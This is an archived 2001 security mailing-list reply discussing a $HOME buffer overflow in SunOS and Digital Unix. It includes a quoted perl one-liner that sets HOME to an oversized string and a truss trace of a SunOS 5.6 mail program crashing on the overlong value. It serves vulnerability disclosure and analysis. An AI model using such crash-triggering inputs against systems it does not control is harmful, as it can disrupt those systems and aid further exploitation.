Re: $HOME buffer overflow in SunOS 5.8 x86

From: Nicolas Dubee (ndubeeat_private)
Date: Tue Jun 05 2001 - 18:12:55 PDT

Next message: KF: "Re: Qpopper 4.0.3 **** Fixes Buffer Overflow **** (fwd)"

Previous message: Tohru Watanabe: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Maybe in reply to: Georgi Guninski: "$HOME buffer overflow in SunOS 5.8 x86"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> > $HOME buffer overflow in SunOS 5.8 x86

...

>Digital Unix V4.0C is vulnerable:
>
>digital> uname -a
>OSF1 digital V4.0 564.32 alpha
>digital> setenv HOME `perl -e 'print "a"x1100'`
>Received disconnect: Command terminated on signal 6.
>
>[and I am logged out of the machine]
>

rather looks like a bug in the shell itself, or in some library function used in
it. What shell are you using?

As for the Sparc mail, at least 2.6 is also affected (most surely others as
well, the program doesn't actually crash but loops in a signal handler):

   yoki# uname -a
   SunOS yoki 5.6 Generic_105181-06 sun4u sparc SUNW,Ultra-1
   yoki# more truss.output
... 
   getgid()                                        = 1 [6]
   setgid(1)                                       = 0
   access("dead.letter", 0)                        Err#2 ENOENT
   access(".", 2)                                  = 0
   stat("dead.letter", 0xEFFFD1A8)                 Err#2 ENOENT
   brk(0x0003F120)                                 = 0
   brk(0x00041120)                                 = 0
   access("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 0) Err#78 ENAMETOOLONG
   access("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 2) Err#78 ENAMETOOLONG
       Incurred fault #5, FLTACCESS  %pc = 0x00017EDC
         siginfo: SIGBUS BUS_ADRALN addr=0x41414209
       Received signal #10, SIGBUS [caught]
         siginfo: SIGBUS BUS_ADRALN addr=0x41414209
   sigaction(SIGBUS, 0xEFFFCC50, 0xEFFFCCD0)       = 0
   sigaction(SIGBUS, 0xEFFFCC50, 0xEFFFCCD0)       = 0
   write(2, " A A A A A A A A A A A A".., 9139)    = 9139 
   write(2, " :   E R R O R   s i g n".., 15)      = 15
   write(2, " 1 0\n", 3)                           = 3
...



-nd

Next message: KF: "Re: Qpopper 4.0.3 **** Fixes Buffer Overflow **** (fwd)"
Previous message: Tohru Watanabe: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Maybe in reply to: Georgi Guninski: "$HOME buffer overflow in SunOS 5.8 x86"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 22:24:41 PDT